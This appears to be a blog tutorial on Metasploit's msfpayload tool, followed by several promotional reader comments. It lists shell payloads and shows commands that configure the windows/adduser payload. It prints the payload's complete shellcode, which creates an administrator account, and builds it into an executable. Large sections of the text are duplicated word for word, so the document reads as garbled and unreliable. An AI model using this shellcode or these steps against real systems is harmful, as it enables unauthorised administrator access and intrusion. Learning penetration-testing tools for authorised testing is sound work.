Metasploit is a huge tool. When I started learning and playing with it, all I knew was use,set,exploit and run.
That was awesome and I was happy with that. But then, I came to know that many Metasploit users don't even use the framework to its 50% capabilities. So I started exploring in the Metasploit directory and lo, so many utilities were sitting there begging me to use them! In this multi part series, I will introduce all these little gems that are packed in the Metasploit directory, ready to make your life a lot easier.
msfpayload
This is a command line utility in Metasploit, it is used for generating shellcode or a standalone payload which can be delivered to the victim for execution. Its real benefits are realized when developing new exploit modules and testing different types of shellcode with it.
The syntax for msfpayload is very simple.
Syntax:
Usage: ./msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>
OPTIONS:
-h Help banner
-l List available payloads
msfpayload -l
Lists all available payload as expected.
Framework Payloads (228 total)
==============================
Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsd/sparc/shell_bind_tcp Listen for a connection and spawn a command shell
bsd/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsd/x86/exec Execute an arbitrary command
bsd/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service
bsd/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service
bsd/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
bsd/x86/shell/find_tag Use an established connection, Spawn a command shell (staged)
bsd/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
bsd/x86/shell_bind_tcp Listen for a connection and spawn a command shell
bsd/x86/shell_find_port Spawn a shell on an established connection
bsd/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
bsd/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsdi/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
bsdi/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
bsdi/x86/shell_bind_tcp Listen for a connection and spawn a command shell
bsdi/x86/shell_find_port Spawn a shell on an established connection
bsdi/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
cmd/unix/bind_inetd Listen for a connection and spawn a command shell (persistent)
cmd/unix/bind_netcat Listen for a connection and spawn a command shell via netcat
cmd/unix/bind_perl Listen for a connection and spawn a command shell via perl
cmd/unix/bind_ruby Continually listen for a connection and spawn a command shell via Ruby
cmd/unix/generic Executes the supplied command
cmd/unix/interact Interacts with a shell on an established socket connection
After choosing payload, available variables for that payload can be listed out by using 'O' or 'S' argument.
./msfpayload windows/adduser S
So, from the above information, we know that this payload requires 3 options to be set. We can change the values of these options if needed.
./msfpayload windows/adduser PASS=betterhacker USER=betterhacker O
--snip--
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
PASS betterhacker yes The password for this user
USER betterhacker yes The username to create
This way all available options for a payload can be modified. For example, if a payload requires you to provide RHOST IP address, you can mention it on the command line specifying its value.
./msfpayload windows/meterpreter/bind_tcp RHOST=192.168.1.2
Now this shellcode can be directly used in an exploit!
That was awesome and I was happy with that. But then, I came to know that many Metasploit users don't even use the framework to its 50% capabilities. So I started exploring in the Metasploit directory and lo, so many utilities were sitting there begging me to use them! In this multi part series, I will introduce all these little gems that are packed in the Metasploit directory, ready to make your life a lot easier.
msfpayload
This is a command line utility in Metasploit, it is used for generating shellcode or a standalone payload which can be delivered to the victim for execution. Its real benefits are realized when developing new exploit modules and testing different types of shellcode with it.
The syntax for msfpayload is very simple.
Syntax:
Usage: ./msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>
OPTIONS:
-h Help banner
-l List available payloads
msfpayload -l
Lists all available payload as expected.
Framework Payloads (228 total)
==============================
Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsd/sparc/shell_bind_tcp Listen for a connection and spawn a command shell
bsd/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsd/x86/exec Execute an arbitrary command
bsd/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service
bsd/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service
bsd/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
bsd/x86/shell/find_tag Use an established connection, Spawn a command shell (staged)
bsd/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
bsd/x86/shell_bind_tcp Listen for a connection and spawn a command shell
bsd/x86/shell_find_port Spawn a shell on an established connection
bsd/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
bsd/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsdi/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
bsdi/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
bsdi/x86/shell_bind_tcp Listen for a connection and spawn a command shell
bsdi/x86/shell_find_port Spawn a shell on an established connection
bsdi/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
cmd/unix/bind_inetd Listen for a connection and spawn a command shell (persistent)
cmd/unix/bind_netcat Listen for a connection and spawn a command shell via netcat
cmd/unix/bind_perl Listen for a connection and spawn a command shell via perl
cmd/unix/bind_ruby Continually listen for a connection and spawn a command shell via Ruby
cmd/unix/generic Executes the supplied command
cmd/unix/interact Interacts with a shell on an established socket connection
--snip--
After choosing payload, available variables for that payload can be listed out by using 'O' or 'S' argument.
./msfpayload windows/adduser S
Name: Windows Execute net user /ADD
Module: payload/windows/adduser
Version: 13053, 9179
Platform: Windows
Arch: x86
Needs Admin: Yes
Total size: 287
Rank: Normal
Provided by:
hdm <[email protected]>
vlad902 <[email protected]>
sf <[email protected]>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
PASS metasploit yes The password for this user
USER metasploit yes The username to create
Description:
Create a new user and add them to local administration group
So, from the above information, we know that this payload requires 3 options to be set. We can change the values of these options if needed.
./msfpayload windows/adduser PASS=betterhacker USER=betterhacker O
--snip--
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
PASS betterhacker yes The password for this user
USER betterhacker yes The username to create
This way all available options for a payload can be modified. For example, if a payload requires you to provide RHOST IP address, you can mention it on the command line specifying its value.
./msfpayload windows/meterpreter/bind_tcp RHOST=192.168.1.2
The last part in the command syntax is the output format of this shellcode. Following types of outputs are supported: C, Perl, Ruby, Javascript, Exe, Dll, VBA, Raw
./msfpayload windows/adduser C
/*
* windows/adduser - 287 bytes
* http://www.metasploit.com
* VERBOSE=false, EXITFUNC=process, USER=metasploit,
* PASS=metasploit
*/
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e"
"\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72"
"\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x20\x6d\x65\x74"
"\x61\x73\x70\x6c\x6f\x69\x74\x20\x2f\x41\x44\x44\x20\x26\x26"
"\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70"
"\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
"\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x20\x2f\x41\x44"
"\x44\x00";
Now this shellcode can be directly used in an exploit!
We can also create an executable from msfpayload.
./msfpayload windows/adduser USER=betterhacker PASS=betterhacker X > adduser.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/adduser
Length: 293
Options: {"USER"=>"betterhacker", "PASS"=>"betterhacker"}
./msfpayload windows/adduser USER=betterhacker PASS=betterhacker X > adduser.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/adduser
Length: 293
Options: {"USER"=>"betterhacker", "PASS"=>"betterhacker"}
This creates an exe file with name 'adduser.exe'
It wont work as yet, because we haven't added executable rights to it. To do that:
chmod +x adduser.exe
Now, this little executable is ready to be executed and it works!
That is it for msfpayload. In the next part we will see msfencode and msfvenom. It wont work as yet, because we haven't added executable rights to it. To do that:
chmod +x adduser.exe
Now, this little executable is ready to be executed and it works!
There are lots of information about latest technology and how to get trained in them, like UNIX Certification Courses in Chennai have spread around the web, but this is a unique one according to me. The strategy you have updated here will make me to get trained in future technologies(UNIX Course Chennai). By the way you are running a great blog. Thanks for sharing this.
ReplyDeleteUNIX Certification Courses in Chennai | UNIX Course Chennai
Excellent post....
ReplyDeleteExcellent post. I have read your blog it's very interesting and informative. Keep sharing....
ReplyDelete